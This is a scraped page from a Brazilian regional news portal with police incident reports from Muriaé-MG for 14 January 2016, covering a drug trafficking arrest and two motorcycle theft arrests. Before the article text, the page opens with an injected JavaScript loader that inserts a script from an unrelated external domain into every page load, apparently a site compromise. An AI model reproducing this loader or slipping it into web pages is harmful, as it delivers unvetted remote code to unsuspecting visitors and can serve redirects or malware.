;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 14/01/16. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 14/01/16.

pmmgesOCORRÊNCIAS DE DESTAQUE MURIAÉ – 14/01/2016
76ª CIA PM – MURIAÉ
PM EFETUA PRISÃO POR TRÁFICO DE DROGAS EM MURIAÉ

Em 13/01/2016, por volta das 20h20min, na Rua Carlos Dias Goes, no Bairro São Cristóvão, após diversas denúncias, militares abordaram W.F.C., de 30 anos, V.J.N., de 19 anos e P.S.P., de 21 anos, apontados como responsáveis pelo tráfico de drogas no local. Durante buscas, localizaram com um deles a quantia de R$ 30,00 em moeda corrente e em continuidade, adentraram em uma residência desabitada onde os mesmos frequentam e localizaram 02 tabletes de maconha, 43 pedras de crack e 14 papelotes de cocaína prontos para comercializar. Diante dos fatos, os autores foram presos em flagrante e conduzidos para a Delegacia de Polícia.

PM PRENDE AUTORES DE FURTO EM MURIAÉ

Em 14/01/2016, por volta das 00h05min, na Rua Francisco Cascelli, no Bairro Dornelas, a vítima B.S.G., de 25 anos, informou que sua motocicleta estava estacionada em frente à sua residência e que após alguns minutos deu por falta da mesma. Após denúncia recebida na Sala de Operações, militares localizaram o veículo próximo a um Posto de Combustível, no próprio bairro. De posse das características dos suspeitos, localizaram W.F.S.S., de 25 anos e J.E.A.S., de 33 anos, sendo os mesmos presos e conduzidos para a Delegacia de Polícia. O veículo foi removido ao pátio credenciado.
PM EFETUA PRISÃO POR FURTO DE MOTOCICLETA EM PATROCÍNIO DO MURIAÉ

Em 13/01/2016, por votla das 14h30min, na Rua Rodolfo Ribeiro de Oliveira, no Bairro Coab, o autor W.C.P., de 31 anos estava conduzindo uma motocicleta em alta velocidade e no momento em que percebeu que foi avistado pela guarnição policial, pulou do veículo e saiu em desabalada carreira, pulando muros e sendo localizado em um quintal de uma residência desabitada. Durante a confecção da ocorrência, a Polícia Militar do Rio de Janeiro fez contato informando que o referido veículo seria produto de furto, motivo pelo qual o autor foi preso em flagrante e conduzido para a Delegacia de Polícia. O veículo foi removido ao pátio credenciado.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.